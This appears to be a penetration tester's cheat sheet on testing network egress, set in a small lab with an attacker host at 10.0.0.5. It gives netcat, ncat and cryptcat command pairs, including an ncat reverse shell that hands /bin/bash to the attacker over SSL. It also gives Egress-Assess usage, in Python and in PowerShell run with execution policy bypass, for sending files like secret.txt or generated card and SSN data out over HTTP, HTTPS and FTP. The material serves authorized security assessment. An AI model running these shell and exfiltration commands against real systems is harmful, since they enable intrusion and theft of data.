Egress


target - Ubuntu     10.0.0.10
target2 - Windows   10.0.0.11
attacker            10.0.0.5

# netcat
target              nc 10.0.0.5 80
attacker            nc -lvp 80

# ncat
target              ncat 10.0.0.5 --ssl -e /bin/bash
attacker            ncat -l 443 --ssl

# cryptcat
target              cryptcat 10.0.0.5 80 -k password
attacker            cryptcat -lvp 80 -k password

# Egress-Assess

Works as a client/server model.

./Egress-Assess.py -h
./Egress-Assess.py --list-clients        dns, dns_resolved, ftp, http, https, icmp, sftp, smb, smtp
./Egress-Assess.py --list-servers        dns, ftp, http, https, icmp, sftp, smb, smtp
./Egress-Assess.py --list-actors         darkhotel, etumbot, putterpanda, zeus
./Egress-Assess.py --list-datatypes      cc, identity, ni, ssn

- Server
./Egress-Assess.py --server <payload & options>
./Egress-Assess.py --server http --server-port 8000

- Client
./Egress-Assess.py --client <payload & options> --ip <server> --datatype <cc or ssn> --data-size <# of MB>
./Egress-Assess.py --client http --client-port 8000 --ip <server> --file /tmp/secret.txt
./Egress-Assess.py --client http --client-port 8000 --ip <server> --datatype cc --data-size 5

Transferred data is stored in data/.

Example 2
- Server
./Egress-Assess.py --server https

- Client
./Egress-Assess.py --client https --ip <server> --file /tmp/secret.txt
./Egress-Assess.py --client https --ip <server> --datatype ssn --data-size 5

Example 3
- Server
./Egress-Assess.py --server ftp --username lee --password hack

- Client
./Egress-Assess.py --client ftp --username lee --password hack --file /tmp/secret.txt
./Egress-Assess.py --client ftp --username lee --password hack --datatype identity --data-size 5

- PowerShell version can only be used as a client.
Its not a one-for-one port. Not all options are the same.
Be sure to use a single dash instead of a double.

powershell -nop -exec bypass
Import-Module .\EgressAssess.ps1

Invoke-EgressAssess -Client http -Port 8000 -IP <server> -Datatype "c:\Users\lee\secret.txt"
Invoke-EgressAssess -Client http -Port 8000 -IP <server> -Datatype ni -Size 5 -Fast

Invoke-EgressAssess -Client ftp -IP <server> -Username lee -Password hack -Datatype "c:\Users\lee\secret.txt"

Note: Comcast blocks port 25 and 445. If you are testing smtp or smb, use alternate ports.
